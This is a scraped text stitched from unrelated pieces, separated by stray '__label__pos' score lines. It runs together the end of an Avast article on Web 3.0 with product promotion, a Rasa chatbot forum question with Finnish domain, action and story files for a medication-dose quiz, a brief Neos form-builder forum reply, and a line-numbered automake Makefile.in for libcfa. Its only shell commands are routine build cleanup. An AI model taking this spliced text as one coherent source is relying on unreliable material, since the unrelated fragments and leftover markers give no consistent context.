Posted 02 September 2014 - 10:54 AM
I already answered this for you: http://www.gamedev.net/topic/660306-xna-4-rendertarget-stencil-buffer/#entry5176471
#3 danromeo Members - Reputation: 238
Like
0Likes
Like
Posted 02 September 2014 - 11:44 AM
Phil,
You answered with "So you can't set a new render target and use the stencil buffer from a previous one.", and then asked exactly what I was trying to do. I was unable to come back to this for several days so I started a new thread, including code explaining exactly what I'm trying to do.
Maybe I misunderstand you answer, but I'm not setting a new render target and using the stencil buffer from a previous one. Are you saying that I need to set the rendertarget, write to the stencilbuffer, and then immediately send the rendertarget to the pixel shader for the comparison operation? This makes no sense.....you can't send an active rendertarget to the pixel shader, it will error out. Or do you mean that I can only perform a stencil test on the active rendertarget? In this case if I lose my stencil buffer as soon as I set the rendertarget, how can stencil buffering be in any way useful at all? Would I have to create the stencil and perform the comparison test all inside one draw call?
SO if what I'm trying to do isn't possible maybe I could trouble you to explain exactly how I can do this? Really all I'm trying to do is mask certain pixels out of a rendertarget with an early stencil test.....seems pretty simple. This is driving me nuts, and I've found several other examples of people with pretty much the same problem who haven't found a resolution, or people who made it work in XNA 3 but couldn't make it work in XNA 4. I found one guy who says you need to use preservecontents on a rendertarget in order to write to the stencil buffer, but still no dice, although my tests do indicate that the stencil buffer is never being written to.
I can't even find a decent explanation of how stencil buffering works. I might be conceptually completely out of the ballpark. For example, I *think* what I'm doing is comparing the stencil buffer of a rendertarget to a simple reference value. Is this correct? Am I comparing the contents of the rendertarget stencil buffer to the stencil buffer of the back buffer?, noting that I'm not drawing to the back buffer? Is drawing to the backbuffer the only circumstance where stencil buffering will work?
Or maybe you could help me with simple code describing how simple a stencil mask works, that actually does work?
Much Confusion. I really appreciate your help.
#4 phil_t Crossbones+ - Reputation: 5305
Like
1Likes
Like
Posted 02 September 2014 - 11:46 PM
In this case if I lose my stencil buffer as soon as I set the rendertarget, how can stencil buffering be in any way useful at all? Would I have to create the stencil and perform the comparison test all inside one draw call?
Not inside one draw call, but in several draw calls without switching render targets. You generally draw stuff to set the stencil bits how you want (often disabling color writes), and then draw the "actual stuff" that draws based on the stencil comparison.
I think (not sure) that in raw DirectX in PCs you can manage the visual buffer and depth/stencil buffer separately, but they are tied together in XNA (presumably because of this limitation in the Xbox).
For example, I *think* what I'm doing is comparing the stencil buffer of a rendertarget to a simple reference value. Is this correct?
Yes. Or simply writing to the stencil buffer.
So for a very simple use case, maybe you want to draw a circle and have a square cut out of it. So you would first draw the square and have your DepthStencilState set up to set the stencil to 1*, say (GraphicsDevice.Clear will clear it to 0 by default, unless you specify otherwise). Since you don't want to actually see the square, you would also have disabled color writes by setting ColorWriteChannels to None in the BlendState you use. So now you have nothing visible, but you have a square in the stencil buffer where the values are 1.
Next, you would draw the circle (without changing rendertargets) with your DepthStencilState set up to only draw where there is a 1 in the stencil buffer. So the circle will draw everywhere except where the square is.
Here's an XNA stencil buffer example I found. I don't know if it will be helpful, but it should show you how to set up the DepthStencilState to get the functionality you want:
http://scott-franks.com/alpha-masking-in-xna-via-the-stencil-buffer/
*Note that when setting stencil values, the stencil is set depending on whether a pixel is output, even if that pixel is transparent. So if you are setting irregular shapes by drawing sprites, you generally want to be using alpha-testing (which discards transparent pixels), not alpha blending.
#5 danromeo Members - Reputation: 238
Like
0Likes
Like
Posted 03 September 2014 - 06:31 PM
Phil,
Very helpful, thank you very much. Simply put, when I set a new rendertarget I lose the stencil buffers on previous rendertargets. Is this correct? So stenciling needs to be done in a multipass inside of a single SetRenderTarget, yes? What a PITA....
Old topic!
Guest, the last post of this topic is over 60 days old and at this point you may not reply in this topic. If you wish to continue this conversation start a new topic.
PARTNERS
|
__label__pos
| 0.713948 |
expand-keys
vulnerability prototype pollution
severity 7.3
language javascript
registry npm
Description
expand-keys is vulnerable to Prototype Pollution.
Proof of Concept
1. Create the following PoC file:
// poc.js
var {expandKeys} = require("expand-keys")
console.log("Before : " + {}.polluted);
expandKeys({"__proto__.polluted": "Yes! Its Polluted"})
console.log("After : " + {}.polluted);
1. Execute the following commands in terminal:
npm i expand-keys # Install affected module
node poc.js # Run the PoC
1. Check the Output:
Before : undefined
After : Yes! Its Polluted
|
__label__pos
| 0.999981 |
Human-Machine Interfaces: Enhancing Interaction with Technological Systems
elettronica-industriale
Human-machine interfaces (HMIs) represent the communication bridges between human operators and machines. As technology advances, these interfaces evolve, facilitating more efficient and intuitive interactions with various systems and devices.
A computer screen displaying a sleek, futuristic interface with interactive buttons and data visualizations. A robotic arm hovers nearby, ready to manipulate the interface
The development of these interfaces encompasses a wide range of disciplines, including computer science, cognitive psychology, and industrial design, each contributing to the refinement of how humans control and manoeuvre complex machinery and systems.
The effectiveness of a human-machine interface is measured by how seamlessly it enables users to perform their desired tasks. Good HMIs are characterised by their ease of use, responsiveness, and the degree to which they reduce the likelihood of operator error.
Across industries such as manufacturing, aviation, and healthcare, the adaptation of advanced interfaces, including touchscreens, gesture controls, and voice recognition, have revolutionised operational workflows, improving safety and productivity.
As the integration of artificial intelligence and machine learning into these interfaces progresses, they are becoming increasingly sophisticated. Predictive text input, adaptability to user preferences, and automation of routine tasks are just a few of the enhancements that contribute to the modern human-machine interface's capability.
This continual transformation opens up new horizons for how humans interact with technology, continually pushing the boundaries of what machines can accomplish under human guidance.
Overview of Human-Machine Interfaces
Various devices connected to a central control panel, displaying data and controls. Lights and buttons are visible, with wires connecting the different components
Human-machine interfaces (HMIs) are essential in facilitating interaction between people and technology, driving efficiency and effectiveness across various applications. These interfaces range from simple buttons and levers to complex graphical user interfaces (GUIs), each designed to minimise cognitive workload and maximise usability.
Defining Human-Machine Interfaces
Human-machine interfaces (HMIs), also known as man-machine interfaces, create a bridge between the user and the machine, allowing for control and data exchange. The design and implementation of HMIs consider several factors to ensure optimal performance and user experience.
Usability: Central to HMI design, usability refers to the ease with which a user can learn to operate the interface, effectively achieve their goals, and be satisfied with their interaction.
Complexity: The complexity of an HMI should align with the task at hand, providing precise control without overwhelming users. A well-designed interface manages complexity without adding unnecessary cognitive workload.
Graphical User Interfaces (GUIs): GUIs are a prevalent type of HMI, employing graphical icons and visual indicators to present information. They are designed to be intuitive, often making use of touchscreens for direct manipulation of on-screen objects.
• GUI Features:
• Icons and buttons
• Menus and toolbars
• Dialogue boxes and windows
Performance: The effectiveness of an HMI is measured by how well it supports users in performing their tasks. This includes rapid response times, high accuracy, and predictability of the system's behaviour in response to user actions.
Cognitive Workload: A key goal for human-machine interfaces is to minimise the cognitive effort required to operate them. Interfaces should be designed to be understandable and not cognitively taxing, allowing users to focus on their primary tasks.
Technological Components and Hardware
Various technological components and hardware are arranged on a clean, modern surface. Buttons, screens, and ports are visible, creating a complex human-machine interface
The core elements for facilitating efficient human-machine interaction encompass advanced display technologies and robust interaction hardware. They are often supported by intricate systems such as industrial controllers and various sensors.
Display and Visualisation Technologies
Touch Screens: These devices serve as both input and output apparatus, providing an intuitive user interface for direct manipulation of on-screen objects. Remote Monitoring displays allow for the observation of systems at a distance, which is especially beneficial in industrial settings.
• Display: Full-colour, high-resolution LCD or OLED panels are standard, improving clarity for users.
• HMIs (Human-Machine Interfaces): Typically consists of graphical user interfaces (GUIs) that include visual elements such as alarms and indicators to alert the operator to the machine's status.
Interaction Hardware
Buttons and Switches: These are tactile components for controlling machine functions and are designed for quick and straightforward interaction.
• Hardware: Rigorous design focuses on durability and ergonomic efficiency, ensuring that switches and buttons can withstand frequent use.
Keyboards and Mice: Often used for more complex interactions, they provide precise control over the machine's functions.
Industrial Controllers and Sensors
PLCs (Programmable Logic Controllers): Central to industrial automation, they execute pre-programmed commands based on sensor inputs to control machinery.
• Sensors: Various types are employed to detect environmental conditions, positions, and other parameters, relaying crucial data back to the PLCs.
• Alarms: These are designed to notify operators of critical situations requiring immediate attention, often integrated with the PLCs for rapid response.
System Design and Integration
Multiple devices connect to a central interface, displaying data and control options. Visual indicators show system status and user interaction
Effective human-machine interface design hinges on the seamless integration of the system’s components within an overarching framework. It ensures optimal usability and functionality.
This section delves into the essential elements of interface design principles and the ongoing considerations for system requirements and scalability.
Interface Design Principles
A successful interface should balance aesthetics with functionality. Consistency in layout and controls enables users to learn the system efficiently. An emphasis on clarity reduces the risk of errors, improving overall usability.
The interface must allow for:
• Accurate feedback on user actions
• Clear visual hierarchies for task prioritisation
• Accessibility features for diverse user groups
Interaction design principles dictate that the interface should be intuitive, facilitating a quick learning curve and allowing users to focus on their tasks rather than the tools they are using.
System Requirements and Scalability
The backbone of any human-machine interface lies in its capacity to meet initial system requirements and to grow over time (scalability). The design must address the following:
• Hardware compatibility: Ensuring that the system functions across various platforms and industrial control systems.
• Operating systems: Selecting the right OS for stability and support.
• Interoperability: Allowing diverse systems and applications to work together without any impediments.
• Security: Implementing robust security measures to protect against unauthorised access or manipulation of the system.
• Maintenance and Support: Planning for regular updates and technical support to ensure the system’s longevity.
• Cost: Providing cost-effective solutions while not compromising on quality and performance.
A system that scales effectively will handle increased loads and can adapt to evolving business needs or technological advancements. It is imperative to anticipate future requirements and design a system that can be upgraded or expanded with minimal disruption to the existing operations.
Application Domains
A computer screen displaying various interactive icons and buttons for human-machine interface
Human-machine interfaces (HMIs) are pivotal in augmenting efficiency and precision across numerous sectors. They are instrumental in the evolution of industry practices, enabling more intuitive interactions between users and machinery.
Industrial and Manufacturing
The implementation of HMIs within the industrial and manufacturing sectors has been transformational, propelling the momentum of Industry 4.0.
Engineers utilise advanced HMIs to oversee and manipulate industrial processes, enhancing automation and improving production rates.
For instance, in manufacturing, touchscreen panels and control systems allow for real-time monitoring and adjustments, culminating in heightened productivity and safer work environments.
• Industrial Process Control:
• Automation Systems: Simplifying complex operations
• Safety Measures: Minimising human error
Energy and Resource Management
In energy and resource management, particularly within oil and gas, HMIs serve as the nerve centre for controlling intricate operations.
They provide the means for technicians to interact seamlessly with sophisticated systems, facilitating the management of energy production and distribution.
This has led to more sustainable practices, such as recycling processes, being easier to manage and optimise through precise data and control interfaces.
• Oil and Gas Sector:
• Monitoring Equipment: Track performance metrics
• Operational Efficiency: Streamline procedures for energy yield
Consumer Electronics and Automotive
The realm of consumer electronics and the automotive industry has seen a significant integration of HMIs.
From the touchscreens in smartphones to the interactive dashboards in cars, these interfaces have become a staple of modern design and usability.
In vehicles, they contribute to safer and more enjoyable driving experiences, as drivers have access to necessary information and control without distraction.
Systems Operations and Data Management
Effective systems operations and data management are crucial for the integrity and efficiency of human-machine interfaces. They ensure that operators can monitor processes seamlessly and that performance data is acquired and analysed accurately, minimising the potential for human error.
Process Control and Monitoring
Human-machine interfaces in process control utilise Supervisory Control and Data Acquisition (SCADA) systems and Distributed Control Systems (DCS) to provide a high level of automation and remote access.
Operators leverage these systems to manage power distribution and process flows, depicted by P&ID images.
The integration of Internet of Things (IoT) expands the capabilities of these systems, enhancing overall performance.
SCADA systems, in particular, are known for their ability to connect with Remote Terminal Units (RTUs) and communicate using protocols such as Modbus and MQTT.
The use of Graphs and Charts allows for real-time visualisation of process data, aiding in decision-making and immediate response to system changes.
Data Acquisition and Analysis
Data acquisition involves capturing and logging critical data from various sensors and input devices.
The gathered data is managed and stored in sophisticated databases, permitting intricate analysis and historical data review.
Data logging is an essential component, as it ensures that all relevant information is recorded for compliance and operational optimisation.
Through Enterprise Resource Planning (ERP) systems, data from all aspects of operation are integrated, providing a comprehensive view of organisational performance.
The utilisation of advanced analytics allows for predictive maintenance and minimises downtime.
Additionally, remote access via secure networks allows for off-site management and real-time data analysis, enhancing the flexibility and responsiveness of operations.
Emerging Trends and Future Outlook
In the realm of human-machine interfaces, significant advancements are anticipated, particularly in the realms of smart technologies and sophisticated user interfaces that promise enhanced interactions and heightened efficiencies across various domains.
In the next paragraph, we'll take a closer look at some innovations.
Smart Technologies and IoT
The Internet of Things (IoT) continues to revolutionise how people interact with electronic devices.
In recent times we assisted at the integration of IoT into smartphones, tablets, and other electronic devices to streamline data acquisition and control processes.
This integration is pivotal in minimising cognitive workload and reducing industrial accidents.
Devices interconnected through the Internet of Things provide robust access control systems, ensuring secure and efficient automation processes.
1. Integration Examples:
• Smartphones with built-in sensors for environmental monitoring.
• Tablets used for remote control of home automation systems.
2. Impact of IoT:
• Reduction in cognitive workload by using automated alerts and notifications.
• Decrease in industrial accidents via predictive maintenance alerts.
Cookie Settings
This website uses cookies. You can choose to allow or reject certain types hereunder. More information about their use can be found in ourprivacy policy.
They allow core website functionality. The website won’t work without them.
They serve to collect usage statistics, with anonymised IP, that help us improve the website.
Would you like to receive special insights on industrial electronics?
We protect your privacy and handle your data safely, according to the GDPR regulation. By checking here, you agree to the terms contained in our Privacy Policy
Contact Us
|
__label__pos
| 0.775944 |
Base64
Definition - What does Base64 mean?
Base64 is an encoding and decoding technique used to convert binary data to an American Standard for Information Interchange (ASCII) text format, and vice versa. It is used to transfer data over a medium that only supports ASCII formats, such as email messages on Multipurpose Internet Mail Extension (MIME) and Extensible Markup Language (XML) data.
Base64 is also known as Base64 Content-Transfer-Encoding.
Techopedia explains Base64
Base64 is a binary to text encoding scheme that is generally used to transfer content-based messages over the Internet. It works by dividing every three bits of binary data into six bit units. The newly created data is represented in a 64-radix numeral system and as seven-bit ASCII text. Because each bit is divided into two bits, the converted data is 33 percent, or one-third, larger than the original data.
Like binary data, Base64 encoded resultant data is not human readable.
Share this:
|
__label__pos
| 0.997374 |
2018年04月6日网站服务器迁移完成……
mySQL优化, my.ini 配置说明
mysql 苏 demo 2083℃ 0评论
[mysqld]
port = 3306
serverid = 1
socket = /tmp/mysql.sock
skip-name-resolve
#禁止MySQL对外部连接进行DNS解析,使用这一选项可以消除MySQL进行DNS解析的时间。但需要注意,如果开启该选项,则所有远程主机连接授权都要使用IP地址方式,否则MySQL将无法正常处理连接请求!注:如果用winform连接mysql,加入此句速度会有很大的提升
skip-locking
# 避免MySQL的外部锁定,减少出错几率增强稳定性。
back_log = 384
指定MySQL可能的连接数量。当MySQL主线程在很短的时间内接收到非常多的连接请求,该参数生效,主线程花费很短的时间检查连接并且启动一个新线程。 back_log参数的值指出在MySQL暂时停止响应新请求之前的短时间内多少个请求可以被存在堆栈中。 如果系统在一个短时间内有很多连接,则需要增大该参数的值,该参数值指定到来的TCP/IP连接的侦听队列的大小。不同的操作系统在这个队列大小上有它自己的限制。 试图设定back_log高于你的操作系统的限制将是无效的。默认值为50。对于Linux系统推荐设置为小于512的整数。
key_buffer_size = 32M
# key_buffer_size这对MyISAM表来说非常重要。如果只是使用MyISAM表,可以把它设置为可用内存的 30-40%。合理的值取决于索引大小、数据量以及负载 — 记住,MyISAM表会使用操作系统的缓存来缓存数据,因此需要留出部分内存给它们,很多情况下数据比索引大多了。尽管如此,需要总是检查是否所有的 key_buffer 都被利用了 — .MYI 文件只有 1GB,而 key_buffer 却设置为 4GB 的情况是非常少的。这么做太浪费了。如果你很少使用MyISAM表,那么也保留低于 16-32MB 的key_buffer_size 以适应给予磁盘的临时表索引所需。
innodb_buffer_pool_size = 2.4G
#这对Innodb表来说非常重要。Innodb相比MyISAM表对缓冲更为敏感。MyISAM可以在默认的 key_buffer_size 设置下运行的可以,然而Innodb在默认的innodb_buffer_pool_size 设置下却跟蜗牛似的。由于Innodb把数据和索引都缓存起来,无需留给操作系统太多的内存,因此如果只需要用Innodb的话则可以设置它高达 70-80% 的可用内存。– 如果你的数据量不大,并且不会暴增,那么无需把innodb_buffer_pool_size 设置的太大了。
innodb_additional_pool_size = 20M
#这个选项对性能影响并不太多,至少在有差不多足够内存可分配的操作系统上是这样。不过如果你仍然想设置为 20MB(或者更大),因此就需要看一下Innodb其他需要分配的内存有多少。
innodb_log_file_size = 512M
#在高写入负载尤其是大数据集的情况下很重要。这个值越大则性能相对越高,但是要注意到可能会增加恢复时间。我经常设置为64-512MB,根据服务器大小而异。
innodb_log_buffer_size =16M
#默认的设置在中等强度写入负载以及较短事务的情况下,服务器性能还可以。如果存在更新操作峰值或者负载较大,就应该考虑加大它的值了。如果它的值设置太高了,可能会浪费内存 — 它每秒都会刷新一次,因此无需设置超过1秒所需的内存空间。通常8-16MB就足够了。越小的系统它的值越小。
innodb_flush_logs_at_trx_commit = 2
#是否为Innodb比MyISAM慢1000倍而头大?看来也许你忘了修改这个参数了。默认值是 1,这意味着每次提交的更新事务(或者每个事务之外的语句)都会刷新到磁盘中,而这相当耗费资源,尤其是没有电池备用缓存时。很多应用程序,尤其是从 MyISAM转变过来的那些,把它的值设置为 2 就可以了,也就是不把日志刷新到磁盘上,而只刷新到操作系统的缓存上。日志仍然会每秒刷新到磁盘中去,因此通常不会丢失每秒1-2次更新的消耗。如果设置为0就快很多了,不过也相对不安全了 — MySQL服务器崩溃时就会丢失一些事务。设置为2指挥丢失刷新到操作系统缓存的那部分事务。
max_allowed_packet = 4M
thread_stack = 256K
table_cache = 128K
sort_buffer_size = 6M
#查询排序时所能使用的缓冲区大小。注意:该参数对应的分配内存是每连接独占!如果有100个连接,那么实际分配的总共排序缓冲区大小为100 × 6 = 600MB。所以,对于内存在4GB左右的服务器推荐设置为6-8M。
read_buffer_size = 4M
#读查询操作所能使用的缓冲区大小。和sort_buffer_size一样,该参数对应的分配内存也是每连接独享!
join_buffer_size = 8M
#联合查询操作所能使用的缓冲区大小,和sort_buffer_size一样,该参数对应的分配内存也是每连接独享!
myisam_sort_buffer_size = 64M
table_cache = 512
#打开一个表的开销可能很大。例如MyISAM把MYI文件头标志该表正在使用中。你肯定不希望这种操作太频繁,所以通常要加大缓存数量,使得足以最大限度地缓存打开的表。它需要用到操作系统的资源以及内存,对当前的硬件配置来说当然不是什么问题了。如果你有200多个表的话,那么设置为 1024 也许比较合适(每个线程都需要打开表),如果连接数比较大那么就加大它的值。我曾经见过设置为100,000的情况。
thread_cache_size = 64
#线程的创建和销毁的开销可能很大,因为每个线程的连接/断开都需要。我通常至少设置为 16。如果应用程序中有大量的跳跃并发连接并且 Threads_Created 的值也比较大,那么我就会加大它的值。它的目的是在通常的操作中无需创建新线程。
query_cache_size = 64M
#指定MySQL查询缓冲区的大小。可以通过在MySQL控制台执行以下命令观察:
# > SHOW VARIABLES LIKE ‘%query_cache%’;
# > SHOW STATUS LIKE ‘Qcache%’;
# 如果Qcache_lowmem_prunes的值非常大,则表明经常出现缓冲不够的情况;如果Qcache_hits的值非常大,则表明查询缓冲使用非常频繁,如果该值较小反而会影响效率,那么可以考虑不用查询缓冲;Qcache_free_blocks,如果该值非常大,则表明缓冲区中碎片很多。
tmp_table_size = 256M
max_connections = 768
#指定MySQL允许的最大连接进程数。如果在访问论坛时经常出现Too Many Connections的错误提 示,则需要增大该参数值。
max_connect_errors = 10000000
wait_timeout = 10
#指定一个请求的最大连接时间,对于4GB左右内存的服务器可以设置为5-10。
thread_concurrency = 8
#该参数取值为服务器逻辑CPU数量×2,在本例中,服务器有2颗物理CPU,而每颗物理CPU又支持H.T超线程,所以实际取值为4 × 2 = 8
skip-networking
#开启该选项可以彻底关闭MySQL的TCP/IP连接方式,如果WEB服务器是以远程连接的方式访问MySQL数据库服务器则不要开启该选项!否则将无法正常连接!
show status 命令
含义如下:
aborted_clients 客户端非法中断连接次数
aborted_connects 连接mysql失败次数
com_xxx xxx命令执行次数,有很多条
connections 连接mysql的数量
Created_tmp_disk_tables 在磁盘上创建的临时表
Created_tmp_tables 在内存里创建的临时表
Created_tmp_files 临时文件数
Key_read_requests The number of requests to read a key block from the cache
Key_reads The number of physical reads of a key block from disk
Max_used_connections 同时使用的连接数
Open_tables 开放的表
Open_files 开放的文件
Opened_tables 打开的表
Questions 提交到server的查询数
Sort_merge_passes 如果这个值很大,应该增加my.cnf中的sort_buffer值
Uptime 服务器已经工作的秒数
提升性能的建议:
1.如果opened_tables太大,应该把my.cnf中的table_cache变大
2.如果Key_reads太大,则应该把my.cnf中key_buffer_size变大.可以用Key_reads/Key_read_requests计算出cache失败率
3.如果Handler_read_rnd太大,则你写的SQL语句里很多查询都是要扫描整个表,而没有发挥索引的键的作用
4.如果Threads_created太大,就要增加my.cnf中thread_cache_size的值.可以用Threads_created/Connections计算cache命中率
5.如果Created_tmp_disk_tables太大,就要增加my.cnf中tmp_table_size的值,用基于内存的临时表代替基于磁盘的
打赏
转载请注明:苏demo的别样人生 » mySQL优化, my.ini 配置说明
如果本篇文章对您有帮助,欢迎向博主进行赞助,赞助时请写上您的用户名。
支付宝直接捐助帐号[email protected] 感谢支持!
喜欢 (0)or分享 (0)
发表我的评论
取消评论
表情
|
__label__pos
| 0.583935 |
17.10 - Usage Notes - Advanced SQL Engine - Teradata Database
Teradata Vantage™ - Database Utilities
Product
Advanced SQL Engine
Teradata Database
Release Number
17.10
Release Date
July 2021
Content Type
Configuration
Publication ID
B035-1102-171K
Language
English (United States)
The following rules apply to the use of wildcard syntax in the CHECK command. Assume that the databases and tables in the examples exist in the system, unless stated otherwise.
Rule Example
You can specify the following valid ASCII characters in the wildcard syntax:
• A … Z
• a … z
• 0 … 9
• _ (low line or underscore)
• $ (dollar sign)
• # (number sign)
You cannot use digits 0 … 9 as wildcards to describe the first character in the name.
Example 1: The following is a valid command:
CHECK db1.t[#af_2r]1 AT LEVEL ONE;
Example 2: The following is not a valid command:
CHECK db[#,kA-d159]xy AT LEVEL ONE;
The above command results in a syntax error because the wildcards specified for database name include the non-valid comma (,). For information on syntax error messages, see Syntax Error Messages.
You must specify the wildcard characters within square brackets. The wildcard syntax begins with a left square bracket ([) and ends with a right square bracket (]). Example 1:Databases db1, db2, db3, db4, and db5 exist, and you want only the tables in db1 and db5 checked. Type the following:
CHECK db[15] AT LEVEL ONE;
CheckTable checks all the tables in databases db1 and db5 at level one. The wildcard syntax defines two possible values (1 and 5) for the third character in the database name.
Example 2:Databases db1, dc1, dd1, and so on exist, and each database contains tables t1, t2, t3, and so on. Using the wildcard syntax in any place in the name, type the following:
CHECK d[bd]1.t[123] AT LEVEL ONE;
CheckTable checks tables t1, t2, t3 in databases db1 and dd1.
Example 3: To specify wildcard syntax in multiple places in a name, type the following:
CHECK db[12][pq] AT LEVEL TWO;
CheckTable checks databases db1p, db2p, db1q, and db2q at level two. The wildcard syntax defines the possible values for the third and fourth characters of the database name.
You cannot specify the special characters % and ? within wildcard syntax. However, you can use the special characters % and ? with any valid wildcard syntax. Example 1:Databases dba1, dba2, db11 and db12 exist, and you want to check databases dba1, dba2, db11, and db12. Type the following:
CHECK db[a1]? at level one;
This command is valid, because the ‘?’ is outside the wildcard syntax.
Example 2: The following is not a valid command, because the ‘?’ is not allowed in wildcard syntax.
CHECK db[a1?] at level one;
You can use wildcard syntax to specify the names or lists of the databases and tables to check and the list of databases or tables not to check. Example 1:Databases db1, db2, db3 and db4 exist, and you type the following:
CHECK db% exclude db[34] at level one;
Databases db1 and db2 are checked.
Example 2: Databases db1, db2, db3 and db4 exist, and all these databases have tables t1, t2, t3 and t4. You type the following:
CHECK db[23] exclude t[14] at level one;
CheckTable checks tables t2 and t3 in databases db2 and db3.
You can use wildcard syntax to specify a range of characters by separating two characters with a hyphen (-). For example, C and J separated by the hyphen (C-J) represent any characters lexically between C and J inclusive.
• The two characters should be of the same type: uppercase, lowercase, or digit.
• The two characters can be in ascending or descending lexical order. For example, [A-D] and [D-A] both specify the same range of characters: A through D inclusive.
Example 1:
CHECK db1.t[1-35] AT LEVEL ONE;
CheckTable checks the tables t1, t2, t3, and t5 in database db1 at level one. 1-3 is considered a range, and 5 is an additional value.
Example 2:
CHECK db[a-5] AT LEVEL ONE;
The check does not take place. CheckTable reports a syntax error because the range specified in dbname is invalid. For information on syntax error messages, see Syntax Error Messages.
Wildcard syntax can include characters that might not have any matching object names in the system.
If the syntax contains some characters that do not have a match at the position specified in any object names in the system, CheckTable checks (or excludes from checking) all the objects whose names match the specified wildcards. CheckTable also ignores the characters that do not have any matching objects. This is true of any number of wildcards.
Example 1: Assume a system contains only databases db1 and db5 but not db2, db3, and so on. Type the following:
CHECK db[125] AT LEVEL ONE;
CheckTable checks all the tables in databases db1 and db5 at level one. Since database db2 does not exist, CheckTable ignores character 2 in the wildcard syntax.
Example 2: Assume a system contains the database db1 but not db2, db3, or db4. Type the following:
CHECK db[1-4] AT LEVEL ONE;
CheckTable checks all the tables in the database db1 and ignores the remaining wildcard characters.
Multiple occurrences of the same character in the wildcard syntax are valid. If you repeat the same character in the syntax for the same position, then CheckTable recognizes the first occurrence and ignores the repeated instances. Example 1: In the following command, character b is repeated in the same position.
CHECK d[abb]1 AT LEVEL ONE;
CheckTable checks all tables in the databases da1 and db1 at level one and ignores the second instance of character b. No warning appears.
Example 2: In the following command, character 3 is specified as part of the hyphen range 1-5 and is repeated separately in the same position.
CHECK db[1-53] AT LEVEL ONE;
CheckTable checks all tables in the databases db1, db2, db3, db4, and db5 at level one. CheckTable ignores the repeated character 3.
The wildcard syntax does not apply when enclosed between apostrophes or double quotation marks. In the following command, character p is a wildcard enclosed in double quotation marks.
CHECK db1."[p]" AT LEVEL ONE;
CheckTable ignores the square brackets and checks only table “[p]”, if it exists in database db1. If table “[p]” does not exist in db1, then a warning appears.
|
__label__pos
| 0.894945 |
各种各样的数
基本
N Z Q R C {\displaystyle \mathbb {N} \subseteq \mathbb {Z} \subseteq \mathbb {Q} \subseteq \mathbb {R} \subseteq \mathbb {C} }
正数 R + {\displaystyle \mathbb {R} ^{+}}
自然数 N {\displaystyle \mathbb {N} }
正整数 Z + {\displaystyle \mathbb {Z} ^{+}}
小数
有限小数
无限小数
循环小数
有理数 Q {\displaystyle \mathbb {Q} }
代数数 A {\displaystyle \mathbb {A} }
实数 R {\displaystyle \mathbb {R} }
复数 C {\displaystyle \mathbb {C} }
高斯整数 Z [ i ] {\displaystyle \mathbb {Z} [i]}
负数 R {\displaystyle \mathbb {R} ^{-}}
整数 Z {\displaystyle \mathbb {Z} }
负整数 Z {\displaystyle \mathbb {Z} ^{-}}
分数
单位分数
二进分数
规矩数
无理数
超越数
虚数 I {\displaystyle \mathbb {I} }
二次无理数
艾森斯坦整数 Z [ ω ] {\displaystyle \mathbb {Z} [\omega ]}
延伸
二元数
四元数 H {\displaystyle \mathbb {H} }
八元数 O {\displaystyle \mathbb {O} }
十六元数 S {\displaystyle \mathbb {S} }
超实数 R {\displaystyle ^{*}\mathbb {R} }
大实数
上超实数
双曲复数
双复数
复四元数
共四元数英语Dual quaternion
超复数
超数
超现实数
其他
质数 P {\displaystyle \mathbb {P} }
可计算数
基数
阿列夫数
同余
整数数列
公称值
规矩数
可定义数
序数
超限数
p进数
数学常数
圆周率 π = 3.141592653 {\displaystyle \pi =3.141592653\dots }
自然对数的底 e = 2.718281828 {\displaystyle e=2.718281828\dots }
虚数单位 i = 1 {\displaystyle i={\sqrt {-1}}}
无穷大 {\displaystyle \infty }
小数,是实数的一种特殊的表现形式。所有分数都可以表示成小数,小数中的圆点叫做小数点,它是一个小数的整数部分和小数部分的分界号。其中整数部分是零的小数称为纯小数,整数部分不是零的小数称为带小数
1.234
整数部分小数点 小数部分
性质
1. 在小数的末尾添上或去掉任意个零,小数的大小不变。例如:0.4=0.400,0.060=0.06。
2. 把小数点分别向右(或向左)移动n位,则小数的值将会扩大(或缩小)基底的n次方倍。(例如对十进制来说就是 10 n {\displaystyle 10^{n}}
分类
有限小数
小数部分后有有限个数位的小数。如3.1465,0.364,8.3218798456等,有限小数都属于有理数,可以化成分数形式。
一个最简分数可以被化作十进制的有限小数当且仅当其分母只含有质因数2或5或两者。类似的,一个最简分数可以被化作某正整数底数的有限小数当且仅当其分母之质因数为此基底质因数的子集。
无限小数
从小数部分的某一位起,一个数字或几个数字,依次不断地重复出现的小数叫做循环小数。如 1 7 = 0.142 857 142 857 142 857 {\displaystyle {\frac {1}{7}}=0.142\ 857\ 142\ 857\ 142\ 857\ldots } 11 6 = 1.833 333 {\displaystyle {\frac {11}{6}}=1.833\ 333\ldots } 等。循环小数亦属于有理数,可以化成分数形式。
小数部分有无限多个数字,且没有依次不断地重复出现的一个数字或几个数字的小数叫做无限不循环小数,如圆周率 π = 3.141 592 653 589 793 23 {\displaystyle \pi =3.141\ 592\ 653\ 589\ 793\ 23\ldots } ,自然对数的底数 e = 2.718 281 828 459 04 {\displaystyle e=2.718\ 281\ 828\ 459\ 04\ldots } 。无限不循环小数也就是无理数,不能化成分数形式。
小数与分数的转化
有限小数化分数:化为十分之几(百分之几……)后约分。
纯循环小数化分数:循环节作为分子,循环节如果有一位,分母为9;循环节有两位,分母为99;循环节有三位,分母为999,依次类推。如 0.9999... = 9 9 = 1 {\displaystyle 0.9999...={\frac {9}{9}}=1} 0.2525... = 25 99 {\displaystyle 0.2525...={\frac {25}{99}}} 0.333... = 3 9 = 1 3 {\displaystyle 0.333...={\frac {3}{9}}={\frac {1}{3}}} ,能约分的要约分。
混循环小数化分数:化为有限小数和纯循环小数之和后化简,如 0.1333333... = 0.1 + 0.0333333... = 2 15 {\displaystyle 0.1333333...=0.1+0.0333333...={\frac {2}{15}}}
无限不循环小数为无理数,不可以化为分数。
其他小数表示方式
某些场合,如在交易市场上,一般撷取到小数点后二位(姑且不论采用何种数值修約规则),由此也衍生出其他的小数表示方式。以3.14(或3,14)为例:
中文记数法
主条目:中文数字
中国未引入西方的小数点前,中文有一套小数单位表示小数[来源请求]:分、釐、毫、丝、忽、微、纤等等,各单位是前一个的十分之一。如3.1416,读作“三又一分四釐一毫六丝”或“三个一分四釐一毫六丝”。小数点自西方传入中国后,小数单位除对译十进制词头外已逐渐不用,现时分、釐仍会用于利率。
内部链接
注解
1. ^ 常见于交易报价软件,小数部分以略小的字体书写,并画上底线;或中华邮政之邮票,例:常085总统府邮票[永久失效链接];常136浆果邮票[永久失效链接]
2. ^ 林鹤一、淡中济著,黄元吉译,《算术-整数及小数》,万有文库第一集,民国十八年初版。
规范控制
• NDL: 00572299
中文数字单位
